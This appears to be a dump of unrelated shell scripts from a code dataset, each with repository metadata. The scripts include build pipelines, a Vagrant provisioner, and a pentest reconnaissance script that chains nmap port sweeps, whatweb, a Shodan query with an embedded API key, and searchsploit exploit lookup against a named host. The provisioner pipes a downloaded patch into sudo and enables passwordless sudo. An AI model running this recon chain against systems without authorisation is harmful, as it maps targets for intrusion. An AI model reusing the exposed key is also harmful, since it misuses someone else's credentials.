if [[ ${COUNTER} == "1" ]]; then
ACTIONS+=(" o Creating list of action items for CI Pipeline to copy/paste in gitlab-ci.yml.")
ACTIONS+=(" less ${OUTPUT_FILE_NAME_PIPELINE}")
fi
LINES=()
LINES+=("")
LINES+=("${SAMPLE_SHORT}:")
LINES+=(" variables:")
LINES+=(" SAMPLE_SHORT: \"${SAMPLE_SHORT}\"")
LINES+=(" CHANNEL: \"${CHANNEL}\"")
LINES+=(" PERIOD: \"${PERIOD}\"")
LINES+=(" DERIV: \"${DERIV}\"")
LINES+=(" NR_EVENTS: \"${NR_EVENTS}\"")
LINES+=(" SAMPLE_LONG: \"${SAMPLE_LONG}\"")
LINES+=(" <<: *run_job")
for LINE in "${LINES[@]}"
do
echo "${LINE}" >> ${OUTPUT_FILE_NAME_PIPELINE}
done
fi
# to submit the Maker
if [[ ${DO_RUN_SUBMITMAKER} == "1" ]]; then
if [[ ${COUNTER} == "1" ]]; then
ACTIONS+=("Submitting Maker locally.")
fi
COMMAND="source ../source/CxAODOperations_VHbb/scripts/submitMaker.sh ${CHANNEL} ${PERIOD} ${DERIV} ${STEM} ${VTAG} ${GRID} ${USE_PF} ${USE_TCC} ${NR_EVENTS} ${LOCAL_SAMPLE} ${LOG_FILE}_PF_${USE_PF} ${DO}"
echo "COMMAND=${COMMAND}"
eval ${COMMAND}
fi
# done for this sample
echo "Done submitting for ${sampleShort}"
# done all for current package
done < ${INPUT_FILE_NAME}
# done loop over all the packages
echo ""
echo ""
echo "Done in parallel for all jobs the following actions:"
for ACTION in "${ACTIONS[@]}"
do
echo "${ACTION}"
done
echo "Done all!"
| true |
2af868d2b13bbd2153380cefa8c9802711d0104d | Shell | Blackweather/rpg-station | /import.sh | UTF-8 | 1,065 | 4.125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# this script runs the Python script
# for importing games
# into Raspberry Pi Gaming Station
# no parameters - import directory
# -f - import single file
# -f <filename> - import by filename
function show_warning() {
echo "Wrong parameters"
echo "Use ./import.sh -h for help"
}
if [[ "$#" -eq 0 ]]; then
echo "Pick a directory to import files from"
cd src/rpg-station
python3 importer.py
elif [[ "$#" -eq 1 ]]; then
if [[ "$1" == "-h" ]]; then
echo "Pick a directory to import to Raspberry Pi Gaming Station - ./import.sh"
echo "Pick a file to import to Raspberry Pi Gaming Station - ./import.sh -f"
echo "Import specified file to Raspberry Pi Gaming Station - ./import.sh -f <filename>"
elif [[ "$1" == "-f" ]]; then
echo "Pick a file to import"
cd src/rpg-station
python3 importer.py -f
else
show_warning
fi
elif [[ "$#" -eq 2 ]]; then
if [[ "$1" == "-f" ]]; then
echo "Trying to import file $2 to Raspberry Pi Gaming Station"
cd src/rpg-station
python3 importer.py -f $2
else
show_warning
fi
else
show_warning
fi
| true |
874d6c82ec64b39f194eb527f1bcb08fa38c524e | Shell | spaghettimaster/punbb | /conf.d/downloads | UTF-8 | 224 | 2.828125 | 3 | [] | no_license | #!/bin/bash -ex
dl() {
[ "$FAB_HTTP_PROXY" ] && PROXY="--proxy $FAB_HTTP_PROXY"
cd $2; curl -L -f -O $PROXY $1; cd -
}
VERSION="1.4.4"
dl http://punbb.informer.com/download/punbb-${VERSION}.tar.gz /usr/local/src
| true |
e91f4be3a3fbdd99c5041a25e35111160b503276 | Shell | pR0Ps/dotfiles | /bin/exiftransferartist | UTF-8 | 851 | 4.1875 | 4 | [] | no_license | #!/bin/bash
set -e
if [ "$#" -lt 1 ]; then
echo "Transfer exif Artist data from JPG previews to matching raw (CR2, ORF) files"
echo ""
echo "Usage: $(basename "$0") <dir>"
exit 1
fi
# Uses the exifartist script to do the modifications
if ! command -v exifartist >/dev/null; then
echo "ERROR: exifartist must be on your path"
exit 1
fi
cd "$1"
count=0
# TODO: Make more efficient
# shellcheck disable=2016
while IFS='|' read -r file artist; do
for ext in 'CR2' 'ORF'; do
rawfile="${file%.*}.${ext}"
if [ -e "$rawfile" ]; then
((count++))
exifartist "$artist" "$rawfile"
break
fi
done
done < <(exiftool -ignoreMinorErrors -dateFormat "%s" -printFormat '$FileName|$Artist' -if '$Artist' -- *.JPG | sort )
echo "Transferred the artist data of $count images"
| true |
af8c422e65c8ae572f4b4130e9a45063a608d782 | Shell | maaceroo/neutrino1 | /RENO_2018/RENO_osc_spect.sh | UTF-8 | 6,443 | 2.921875 | 3 | [] | no_license | #!/bin/bash
#-----------------------------------------------------------------------------
export JOBID=`(echo $PBS_JOBID | cut -d. -f1)`
echo 'JOBID='${JOBID}
#-----------------------------------------------------------------------------
#Define grid
echo '=========================================='
echo '0) Define Grid'
echo '=========================================='
echo
export NS2T=40
export NDM2=40
export LO_S2T=0.01
export HI_S2T=0.20
#export LO_DM2=1.5e-3 #to use for the combined (DB+RENO) ana.
export LO_DM2=1.7e-3
export HI_DM2=3.5e-3
echo 'Grid in to be used:'
echo 'NS2T='$NS2T
echo 'LO_S2T='$LO_S2T
echo 'HI_S2T='$HI_S2T
echo
echo 'NDM2='$NDM2
echo 'LO_DM2='$LO_DM2
echo 'HI_DM2='$HI_DM2
echo
#Correction factors
export fudge=$FUDGE
export fFac1=$FFAC1
export fFac2=$FFAC2
echo 'Correction factors used in this run:'
echo '------------------------------------'
echo 'fudge='$fudge
echo 'fFac1='$fFac1
echo 'fFac2='$fFac2
echo
#-----------------------------------------------------------------------------
echo
#
# Construct L distribution
echo '=========================================='
echo '1) Running renograph.C'
echo '=========================================='
echo
time root -b -l -n -q renograph.C
echo
#-----------------------------------------------------------------------------
echo
# Construct L distribution
echo '=========================================='
echo '2) Running ldist_2x6_RENO.C'
echo '=========================================='
echo
time root -b -l -n -q ldist_2x6_RENO.C
echo
#-----------------------------------------------------------------------------
# Construct ntuple
echo '=========================================='
echo '3) Running RENO_ntuple_noosc_spect.C'
echo '=========================================='
echo
export NTUPLE_EVENTS=1000000
echo $NTUPLE_EVENTS ntuple events
time root -b -l -n -q RENO_ntuple_noosc_spect.C
echo
#-----------------------------------------------------------------------------
# construct oscillated spectra for all points in the grid
echo '=========================================='
echo '4) Running RENO_osc_spect.C'
echo '=========================================='
echo
time root -b -l -n -q RENO_osc_spect.C
#-----------------------------------------------------------------------------
# Construct ntuple
echo '=========================================='
echo '5) Running RENO_EScaleDeriv_ntuple.C'
echo '=========================================='
echo
time root -b -l -n -q RENO_EScaleDeriv_ntuple.C
echo
#-----------------------------------------------------------------------------
# run minimization
echo '=========================================='
echo '6) Running RENO_minuit_spect.C'
echo '=========================================='
echo
#sel=1 #RENO_minuit_spect.C
sel=2 #RENO_minuit_spect_EScale.C
if [ $sel = 1 ]
then
echo "sel = " $sel
time root -b -l -n -q RENO_minuit_spect.C
else
echo "sel = " $sel
time root -b -l -n -q RENO_minuit_spect_EScale.C
fi
echo
#-----------------------------------------------------------------------------
#Remove first line from file
tail -n +2 ${JOBID}/files/chi2_s2t-dm2_surface_spect.txt > ${JOBID}/files/chi2_s2t-dm2_surface_spect-noFL.txt
#-----------------------------------------------------------------------------
#compile routines for minimization and marginalization
echo '=========================================='
echo 'compiling RENO_margin_spect.cpp'
echo '=========================================='
echo
g++ -o RENO_margin_spect.exe RENO_margin_spect.cpp
#clang++ -o RENO_margin_spect.exe RENO_margin_spect.cpp
echo
#-----------------------------------------------------------------------------
echo '=========================================='
echo 'executing RENO_margin_spect.exe'
echo '=========================================='
echo
time ./RENO_margin_spect.exe $NS2T $NDM2 ./${JOBID}
echo
#-----------------------------------------------------------------------------
#Extract BF_CHI2, BF_S2T, BF_DM2 from chi2_minumum_SPEC.txt
read BF_S2T BF_DM2 BF_CHI2 <<< `cat ${JOBID}/files/chi2_minimun_spect.txt`
#Extract fudge, fFac1 and fFac2 from constants.h
#fudge=$(awk 'NR == 36 {print $4}' constants.h)
#fFac1=$(awk 'NR == 37 {print $4}' constants.h)
#fFac2=$(awk 'NR == 38 {print $4}' constants.h)
#echo 'fudge = ' $fudge
#echo 'fFac1 = ' $fFac1
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
# Form gnuplot script
echo '=========================================='
echo 'Editting gnu plot script ...'
echo '=========================================='
#echo '-------------------------'
#sed -i'' -e "12s/.*/set output \"${JOBID}\/Plots\/RENO_plots_SPEC_fudge_$fudge\_fFac1_$fFac1\_fFac2_$fFac2.pdf\"/" multi_plot_margin_spect_RENO.gnu
#sed -i'' -e "136s/.*/set label 35 '+' at $BF_S2T,$BF_DM2*1e3 center font 'CharterBT-Roman,15'/" multi_plot_margin_spect_RENO.gnu
#sed -i'' -e "138s/.*/min = $BF_CHI2/" multi_plot_margin_spect_RENO.gnu
#echo 'Multiplot Script... Done!'
echo '--------------------------------'
sed -i'' -e "9s/.*/set output \"${JOBID}\/Plots\/plot_SPEC_fudge_$fudge\_fFac1_$fFac1\_fFac2_$fFac2\_EScale.pdf\"/" plot.gnu
sed -i'' -e "51s/.*/set label 35 '+' at $BF_S2T,$BF_DM2*1e3 center font 'CharterBT-Roman,15'/" plot.gnu
sed -i'' -e "53s/.*/min = $BF_CHI2/" plot.gnu
sed -i'' -e "61s/.*/splot '${JOBID}\/files\/chi2_s2t-dm2_surface_spect-noFL.txt' u 1:((\$2)*1e3):((\$3)-min) w l lw 3/" plot.gnu
if [ $sel -eq 1 ]
then
echo "sel = " $sel
sed -i'' -e "75s/.*/set label 55 'Minuit Normal' at 0.145,1.75 font 'CharterBT-Roman,15'/" plot.gnu
else
echo "sel = " $sel
sed -i'' -e "75s/.*/set label 55 'Minuit EScale' at 0.145,1.75 font 'CharterBT-Roman,15'/" plot.gnu
fi
echo 'Comparisson plot Script... Done!'
echo
#----------------------------------------------------------------------------
#Execute gnuplot script
echo '=========================================='
echo 'Runnign gnuplot macro'
echo '=========================================='
echo
#gnuplot multi_plot_margin_spect_RENO.gnu
gnuplot plot.gnu
#rm *.gnu-e
echo
##----------------------------------------------------------------------------
##Open in ghostview
##gv Plots/RENO_plots_SPEC.eps &
##gv Plots/plot_SPEC.eps &
##----------------------------------------------------------------------------
echo Done!
| true |
947db0fb7ec4198e553f0c4b09c0433b293f1188 | Shell | camilogarridobriones/Tecnicas-de-Pentesting | /Camilo_Garrido.sh | UTF-8 | 2,426 | 3.546875 | 4 | [] | no_license | #!/bin/bash
# VARIABLES GLOBALES
#FUNCTION CTRL-C
trap ctrl_c INT
function ctrl_c(){
echo "[$(tput setaf 9)Error$(tput sgr0)] Exiting ...";
sleep 1
_die
}
function _Camilo_Garrido_Scan() {
fqdn=$1
if [ -z "$fqdn" ]; then
echo "[$(tput setaf 8)INFO$(tput sgr0)] Usage: $0 -d www.umayor.cl"
exit 1
fi
ip=$(host -t A $fqdn | awk '{print $NF}')
if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
echo -e "[$(tput setaf 8)INFO$(tput sgr0)] Comenzando con el Análisis sobre $ip"
else
echo -e "[$(tput setaf 9)ERROR$(tput sgr0)] FQDN no encontrado"
exit
fi
echo -e "[$(tput setaf 13)tools$(tput sgr0)] reconocimiento de puertos ..."
nmap -sS --min-rate 5000 --open -n -p- --open $ip -oG /tmp/allPorts >/dev/null
sleep 1
ports="$(cat /tmp/allPorts | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')"
echo -e " [$(tput setaf 46)*$(tput sgr0)] Open ports: $ports"
sleep 1
echo -e "[$(tput setaf 13)tools$(tput sgr0)] script de enumeración ..."
sleep 1
xterm -T 'ENUMERACIÓN' -hold -e "nmap -sC -sV -p$ports $ip -oX /tmp/portExploit.xml" &
sleep 2
pgrep nmap >/dev/null
while [ $? -eq 0 ]; do
sleep 5
pgrep nmap >/dev/null
done
echo -e "[$(tput setaf 13)tools$(tput sgr0)] whatweb"
xterm -T "EXPLORACIÓN WEB" -hold -e "whatweb -v -a 3 http://$fqdn" &
pgrep whatweb >/dev/null
while [ $? -eq 0 ];do
sleep 5
pgrep whatweb >/dev/null
done
echo -e "[$(tput setaf 13)tools$(tput sgr0)] shodan"
xterm -T 'EXPLORACIÓN SHODAN' -hold -e "sleep 2; curl -s -k -X $'GET' 'https://api.shodan.io/shodan/host/$ip?key=MM72AkzHXdHpC8iP65VVEEVrJjp7zkgd&minify=true' | jq" &
sleep 3
echo -e "[$(tput setaf 13)tools$(tput sgr0)] search exploit"
sleep 1
xterm -T 'BUSQUEDA DE EXPLOIT' -hold -e "sleep 2; searchsploit --nmap /tmp/portExploit.xml" &
sleep 3
echo -e "[$(tput setaf 8)INFO$(tput sgr0)] Finalizando Análisis"
sleep 2
rm /tmp/allPorts 2>/dev/null
rm /tmp/portExploit.xml 2>/dev/null
exit 1
}
function _usage() {
echo "$(tput setaf 100) Usage: $0 [options] $(tput sgr0)"
echo "$(tput setaf 100) -d [FQDN] $(tput sgr0)"
echo "$(tput setaf 100) -h [helpPanel] $(tput sgr0)"
echo
}
## MAIN FUNCTION
if [ $(id -u) -eq 0 ]; then
while getopts ":dh:" arg; do
case $arg in
d) _Camilo_Garrido_Scan $2 ;; # scan top 5000 port nmap
h|*) _usage ;;
esac
done
else
echo "[$(tput setaf 9)Error$(tput sgr0)] You must be root!"
fi
| true |
4b54d4d01625985898806019dd45b47d6b654b3c | Shell | lparis/docs-utility-scripts | /rollback_release/install/rollback_release.sh | UTF-8 | 645 | 3.3125 | 3 | [] | no_license | #!/bin/bash
# To install rollback_release, run this script by pasting the following command at the command line (not including the '#' symbol):
# sh $HOME/workspace/docs-utility-scripts/rollback_release/install/rollback_release.sh; source ~/.bash_profile
set -e
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m'
echo 'alias rr="ruby $HOME/workspace/docs-utility-scripts/rollback_release/rr"' >> ~/.bash_profile
printf "\n${MAGENTA} The rollback_release app is ready to go!\n\n You may need to run 'source ~/.bash_profile' to refresh your shell. \n\n You can run it with the 'rr' command from any directory at the command line. .${NC}\n"
| true |
7ed52d92a3b1280c1c35ee62a4c94cfb394904e2 | Shell | nynhex/Perinoid_Linux_Project | /functions/unincorporated/metasploit/installers/source_metasploit_install.sh | UTF-8 | 456 | 2.578125 | 3 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | Source_metasploit_install(){
#Arg_checker "${@:---help='Source_metasploit_install' --exit='# Source_metasploit_install # function was not read arguments'}" -ep='Source_metasploit_install'
#${_metasploit_dir:-/etc}
}
### Source_metasploit_install_help source_metasploit_install_help source_metasploit_install.sh
# File: ${_script_dir}/functions/metasploit/source_metasploit_install.sh
# Argument Variable Default
# [-MFD=...] _metasploit_dir /etc
####
| true |
705cd847e258a41a69c48137cadb28bc7d5ff417 | Shell | lakhanyawa/shtest | /repocreate-remote.sh | UTF-8 | 2,856 | 3.59375 | 4 | [] | no_license | #!/bin/sh
# take repo name from command line
repo_name=$1
test -z $repo_name && echo "Repo name required." 1>&2 && exit 1
SITE_REPO_URL=https://github.com/$username/$repo_name
git ls-remote "$SITE_REPO_URL" > /dev/null 2>&1
if [ "$?" -ne 0 ]; then
echo "[ERROR] Unable to read from '$SITE_REPO_URL'"
echo "creating this repository"
echo -n "Do You Want To Create Admin Repo (y/n)? "
old_stty_admin=$(stty -g)
stty raw -echo ; answer=$(head -c 1) ; stty $old_stty_admin # Careful playing with stty
if echo "$answer" | grep -iq "^y" ;then
curl -u '$username:$userpassword' https://api.github.com/user/repos -d "{\"name\":\"$repo_name"admin"\"}"
mkdir $repo_name"admin"
cd $repo_name"admin"
echo test > README.md
git init
git add .
git commit -m "learning git repository"
git remote add origin https://github.com/$username/$repo_name"admin"
git push -u origin master
git checkout -b dev
git commit -a -m "created dev branch"
git push --mirror
else
echo "We are not creating admin branch as per users response"
fi
echo -n "Do You Want To Create osadmin Repo (y/n)?"
old_stty_osadmin=$(stty -g)
stty raw -echo ; answer=$(head -c 1) ; stty $old_stty_osadmin # Careful playing with stty
if echo "$answer" | grep -iq "^y" ;then
curl -u '$username:$userpassword' https://api.github.com/user/repos -d "{\"name\":\"$repo_name"osadmin"\"}"
mkdir $repo_name"osadmin"
cd $repo_name"osadmin"
echo test > README.md
git init
git add .
git commit -m "learning git repository"
git remote add origin https://github.com/$username/$repo_name"osadmin"
git push -u origin master
git checkout -b dev
git commit -a -m "created dev branch"
git push --mirror
else
echo "We are not creating osadmin branch as per users response"
fi
echo -n "Do You Want To Create devops Repo (y/n)?"
old_stty_devops=$(stty -g)
stty raw -echo ; answer=$(head -c 1) ; stty $old_stty_devops # Careful playing with stty
if echo "$answer" | grep -iq "^y" ;then
curl -u '$username:$userpassword' https://api.github.com/user/repos -d "{\"name\":\"$repo_name"devops"\"}"
mkdir $repo_name"devops"
cd $repo_name"devops"
echo test > README.md
git init
git add .
git commit -m "learning git repository"
git remote add origin https://github.com/$username/$repo_name"devops"
git push -u origin master
git checkout -b dev
git commit -a -m "created dev branch"
git push --mirror
else
echo "We are not creating osadmin branch as per users response"
fi
else
echo "Repository already present"
fi
#repo-check=`git ls-remote https://github.com/$username/test`
| true |
391537aac59abe9bfd8cae4b8903507ed2c8ba61 | Shell | jojiisacth/temp | /redis/ms/run.sh | UTF-8 | 1,342 | 3.328125 | 3 | [] | no_license | #!/bin/bash
# Copyright 2014 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
function launchmaster() {
if [[ ! -e /redis-master-data ]]; then
echo "Redis master data doesn't exist, data won't be persistent!"
mkdir /redis-master-data
fi
redis-server /redisconf/master.conf --protected-mode no
}
function launchslave() {
while true; do
redis-cli -h ${REDIS_MASTER_SERVICE_HOST} INFO
if [[ "$?" == "0" ]]; then
break
fi
echo "Connecting to master failed. Waiting..."
sleep 10
done
sed -i "s/%master-ip%/${REDIS_MASTER_SERVICE_HOST}/" redisconf/slave.conf
#sed -i "s/%master-port%/${REDIS_MASTER_SERVICE_PORT}/" redisconf/slave.conf
redis-server /redisconf/slave.conf --protected-mode no
}
if [[ "${MASTER}" == "true" ]]; then
launchmaster
exit 0
fi
launchslave
| true |
051a25bfccea12459fc18f704e9798582ffe9682 | Shell | rberger/ironfan-ci | /boxes/definitions/ironfan-natty/postinstall.sh | UTF-8 | 5,570 | 3.234375 | 3 | [
"Apache-2.0"
] | permissive |
# This is the ubuntu natty VM postinstall.sh script from infochimps'
# ironfan. It is based on Mitchell's official lucid32/64 baseboxes
# postinstall.sh script, with the following important differences:
#
# * installs ruby 1.9.2 (not 1.8.7) from source
# * upgrades rubygems rather than installing from source
# * pushes the node identity into the first-boot.json
# * installs the chef-client service and kicks off the first run of chef
set -e
RUBY_VERSION=1.9.2-p290
CHEF_VERSION=0.10.08
mkdir -p /tmp/knife-bootstrap
chmod 700 /tmp/knife-bootstrap
cd /tmp/knife-bootstrap
eval `cat /etc/lsb-release `
export DEBIAN_FRONTEND=noninteractive
echo -e "`date` \n\n**** \n**** apt update:\n****\n"
apt-get -y update
apt-get -y upgrade
echo -e "`date` \n\n**** \n**** Installing base packages:\n****\n"
apt-get -y install linux-headers-$(uname -r)
apt-get -y install build-essential make wget curl runit zlib1g-dev libssl-dev openssl libcurl4-openssl-dev libxml2-dev libxslt-dev libyaml-dev libreadline6 libreadline6-dev
apt-get -y install runit-services
apt-get -y install libmysql++-dev libsqlite3-dev
apt-get clean
# Setup sudo to allow no-password sudo for "admin"
cp /etc/sudoers /etc/sudoers.orig
sed -i -e '/Defaults\s\+env_reset/a Defaults\texempt_group=admin' /etc/sudoers
sed -i -e 's/%admin ALL=(ALL) ALL/%admin ALL=NOPASSWD:ALL/g' /etc/sudoers
# Install NFS client
apt-get -y install nfs-common
if [ ! -f /usr/bin/chef-client ]; then
echo -e "`date` \n\n**** \n**** Installing ruby version ${RUBY_VERSION}:\n****\n"
wget ftp://ftp.ruby-lang.org//pub/ruby/1.9/ruby-${RUBY_VERSION}.tar.gz
tar xzf ruby-${RUBY_VERSION}.tar.gz
cd ruby-${RUBY_VERSION}
./configure --with-ruby-version=${RUBY_VERSION} --prefix=/usr --program-suffix=${RUBY_VERSION}
make -j2
make install
sudo update-alternatives --remove-all gem && true
update-alternatives \
--install /usr/bin/ruby ruby /usr/bin/ruby${RUBY_VERSION} 400 \
--slave /usr/bin/ri ri /usr/bin/ri${RUBY_VERSION} \
--slave /usr/bin/irb irb /usr/bin/irb${RUBY_VERSION} \
--slave /usr/bin/erb erb /usr/bin/erb${RUBY_VERSION} \
--slave /usr/bin/gem gem /usr/bin/gem${RUBY_VERSION} \
--slave /usr/share/man/man1/ruby.1.gz ruby.1.gz \
/usr/share/man/man1/ruby${RUBY_VERSION}.1
if ruby -e "exit(%x{gem --version} < \"1.6.2\" ? 0 : -1 )" ; then
echo -e "`date` \n\n**** \n**** Updating rubygems:\n****\n"
# screw you Debian
REALLY_GEM_UPDATE_SYSTEM=1 gem update --system
# screw you rubygems
for foo in /usr/lib/ruby/site_ruby/*/rubygems/deprecate.rb ; do
# Don't have to be any such deprecations, in which case $foo won't exist
[ -f "$foo" ] && sudo sed -i.bak 's!@skip ||= false!true!' "$foo"
done
fi
echo -e "`date` \n\n**** \n**** Installing chef:\n****\n"
gem install ohai --no-rdoc --no-ri
gem install chef --no-rdoc --no-ri --version=$CHEF_VERSION
# gems needed for the client.rb or so generically useful you want them at hand
gem install --no-rdoc --no-ri extlib bundler json right_aws pry
else # no chef-client
echo -e "`date` \n\n**** \n**** Chef is present -- skipping apt/ruby/chef installation\n****\n"
fi # end ruby+chef install
# fix a bug in chef that prevents debugging template errors
# will not work with --prerelease but that's OK hopefully opscode patches this crap soon
bad_template_file="/usr/lib/ruby/gems/${RUBY_VERSION}/gems/chef-${CHEF_VERSION}/lib/chef/mixin/template.rb"
if echo "0505c482b8b0b333ac71bbc8a1795d19 $bad_template_file" | md5sum -c - 2>/dev/null ; then
curl https://github.com/mrflip/chef/commit/655a1967253a8759afb54f30b818bbcb7c309198.patch | sudo patch $bad_template_file
fi
echo -e "`date` \n\n**** \n**** Installing vagrant keys:\n****\n"
mkdir /home/vagrant/.ssh
chmod 700 /home/vagrant/.ssh
cd /home/vagrant/.ssh
wget --no-check-certificate 'http://github.com/mitchellh/vagrant/raw/master/keys/vagrant.pub' -O authorized_keys
chmod 600 /home/vagrant/.ssh/authorized_keys
chown -R vagrant /home/vagrant/.ssh
# Installing the virtualbox guest additions
VBOX_VERSION=$(cat /home/vagrant/.vbox_version)
cd /tmp
wget http://download.virtualbox.org/virtualbox/$VBOX_VERSION/VBoxGuestAdditions_$VBOX_VERSION.iso
mount -o loop VBoxGuestAdditions_$VBOX_VERSION.iso /mnt
sh /mnt/VBoxLinuxAdditions.run
umount /mnt
rm VBoxGuestAdditions_$VBOX_VERSION.iso
echo -e "`date` \n\n**** \n**** Cleanup:\n****\n"
# Remove items used for building, since they aren't needed anymore
apt-get -y remove linux-headers-$(uname -r) build-essential
apt-get -y autoremove
# make locate work good
updatedb
# Ignore the harmless 'no space left on device' error
echo "Zero out the free space to save space in the final image:"
( dd if=/dev/zero of=/EMPTY bs=1M 2>/dev/null ) || true
rm -f /EMPTY
# Removing leftover leases and persistent rules
echo "cleaning up dhcp leases"
rm /var/lib/dhcp*/*
# Make sure Udev doesn't block our network
# http://6.ptmc.org/?p=164
echo "cleaning up udev rules"
rm /etc/udev/rules.d/70-persistent-net.rules
mkdir /etc/udev/rules.d/70-persistent-net.rules
rm -rf /dev/.udev/
rm /lib/udev/rules.d/75-persistent-net-generator.rules
echo "Adding a 2 sec delay to the interface up, to make the dhclient happy"
echo "pre-up sleep 2" >> /etc/network/interfaces
date > /etc/vagrant_box_build_time
echo -e "BUILD_DATE='`date`'\nBUILD_STRING='built by ironfan'\nVBOX_VERSION='$VBOX_VERSION'\nRUBY_VERSION='$RUBY_VERSION'\nCHEF_VERSION='$CHEF_VERSION'" > /etc/ironfan-bootstrap.txt
echo -e "`date` \n\n**** \n**** Cluster Chef client bootstrap complete\n****\n"
exit
| true |
ed3005012aade039914ee9a4a02acc8cbb6b3677 | Shell | Evan-Price-projects/game1 | /game1.sh | UTF-8 | 1,040 | 3.828125 | 4 | [] | no_license | #!/bin/bash
echo -n "Do you want to play a game? [y/n]: "
read ans
guess=5
if [[("$ans" = y) || ("$ans" = Y)]]; then
echo "Let the game begin!"
echo "Guess a number between 1 and what number?"
read topNumber
randomNumber=$((RANDOM % "$topNumber"))
while [ $guess -gt 0 ]; do
echo "what is your guess between 1 and $topNumber"
read results
if [ $results -eq $randomNumber ]; then
echo "WINNER!!! the random number was $randomNumber"
guess=-5
elif [[ $results -lt $randomNumber || $results -gt $randomNumber ]]; then
if [ $results -lt $randomNumber ]; then
((guess-=1))
echo "guess a higher number than your current guess you have $((guess)) guess(es) left"
else
((guess-=1))
echo "guess a lower number than your current guess, you have $((guess)) guess(es) left"
fi
fi
done
if [ $guess -eq 0 ]; then
echo "you lose, the random number was $randomNumber"
fi
else
echo "too bad,\nYou miss 100% of the shots you don't take -Wayne Gretzky"
fi
| true |
0df42097485c6149c13d75c36b7987b05a2b821f | Shell | cypromis/lizardfs-new-documentation | /source/man/create_man_pages.sh | UTF-8 | 199 | 2.921875 | 3 | [] | no_license | # Script to convert all files from rst to manpages using pandoc
mkdir -p manpages
for i in *.rst
do
/usr/local/bin/pandoc -s -f rst -t man $i | iconv -f utf-8 -t latin1 > "manpages/${i/%.rst/}"
done
| true |
e0b413c87bdd497bdc28ee8b3821368384cf9708 | Shell | xdliubuaa/lock_free_ds | /list/lock_free_rcu_list/run_batch_test_rcu.sh | UTF-8 | 705 | 2.765625 | 3 | [] | no_license | #!/usr/bin/env bash
rm log/output
rm core
#NUM=1000
#for i in `seq 1 ${NUM}`; do
# echo "====== $i ======" > log/output
# ./build/x >> log/output
# N=$(cat log/output |grep "successfully" |wc -l)
# if [ ${N} -ne 5 ]; then
# echo "ERROR"
# exit
# fi
#done
#
#echo "----- BATCH TEST SUCCESS -----"
NUM=1000
for i in `seq 1 ${NUM}`; do
echo "====== $i ======" > log/output
./build/rcu >> log/output
N=$(cat log/output |grep "\[" |wc -l)
M=$(cat log/output |grep "SUCCESS" |wc -l)
if [ ${N} -ne 100 ] || [ ${M} -ne 1 ]; then
echo "ERROR"
exit
else
echo "===== $i: success ====="
fi
done
echo "----- BATCH TEST SUCCESS -----" | true |
b030b3fbe8a7bb30ce7698c31ddca75dbd4e0e6a | Shell | Malarkey73/Bash | /CI/HPVcoverage.sh | UTF-8 | 3,739 | 3.25 | 3 | [] | no_license | #!/bin/bash
set -o nounset
set -o errexit
set -o pipefail
# profiled 15GB file in:
#real 11m23.279s
#user 70m25.134s
#sys 9m2.536s
#example log output
# HPV TCGA-BA-5153-01A-01D-1431_120423_SN590_0154_AC0JBHACXX_s_5_rg 138.75
BT2="/home/rmgzshd/bowtie2-2.1.0/bowtie2"
BT2GENOME="/mnt/store1/cghub/HPV_BT2/HPV"
SAMBAMBA="/home/rmgzshd/sambamba/sambamba"
SAMTOOLS="/home/rmgzshd/samtools/samtools"
BEDTOOLS="/home/rmgzshd/bedtools2/bin/bedtools"
GENOMESIZES="/mnt/store1/cghub/HPV_BT2/HPV.sizes"
LOGFILE="/mnt/store1/cghub/HNSC/Tumour/coverage.log"
RESULTS="/mnt/store1/cghub/HNSC/Tumour/Results"
export BT2; export BT2GENOME; export SAMBAMBA; export BEDTOOLS; export RESULTS; export BAMTOOLS;
convertsecs() {
((h=${1}/3600))
((m=(${1}%3600)/60))
((s=${1}%60))
printf "\t%02d:%02d:%02d\n" $h $m $s
}
STARTTIME=$(date +%s)
FOUND=$(find -maxdepth 2 -name *.sorted.bam)
for BAM in $FOUND
do
PREFIX=$(echo ${BAM} | sed 's/.sorted.bam//')
printf "\n\n beginning %s sample.\n " $PREFIX
$SAMBAMBA view --format=bam -F "paired and (unmapped or mate_is_unmapped)" $BAM |
tee >($BEDTOOLS bamtofastq -i stdin -fq R1.fq -fq2 R2.fq) |
$BEDTOOLS bamtobed -bedpe -i stdin | sort -S8G -k 7 |
# I clip the mate pair ID last char read flag so I can merge with HPV bed
#awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5,$6, substr($7, 0, length($7)-2), $8, $9, $10}' > $PREFIX.anchor.bedpe
awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5,$6, $7, $8, $9, $10}' > $PREFIX.anchor.bedpe
# print time
NEXTTIME1=$(date +%s)
printf "\n Finished extracting unmapped reads: \n"
# convertsecs $(($NEXTTIME1 - $STARTTIME))
# Use bowtie2 to find matches amongst the unmapped genome in HPV
# convert to bam
# sort it
$BT2 -p 24 -x $BT2GENOME -1 R1.fq -2 R2.fq |
$SAMBAMBA view -S --format=bam /dev/stdin > tempsortbam
#I have had problems with stability of sambabmba sort of BIG files (>50GB)
#$SAMBAMBA sort -m=32G tempsortbam -o $PREFIX.hpv.bam
$SAMTOOLS sort -@ 12 -m 32G tempsortbam $PREFIX.hpv
# NB sambabmba sort whilst fast doesn't work on stream???
# So it fucks up the pipe flow here (see above)
$BEDTOOLS bamtobed -bedpe -i $PREFIX.hpv.bam | sort -S8G -k 7 |
#awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5, $6, substr($7, 0, length($7)-2), $8, $9, $10}' > $PREFIX.hpv.bedpe awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5, $6, substr($7, 0, length($7)-2), $8, $9, $10}' > $PREFIX.hpv.bedpe
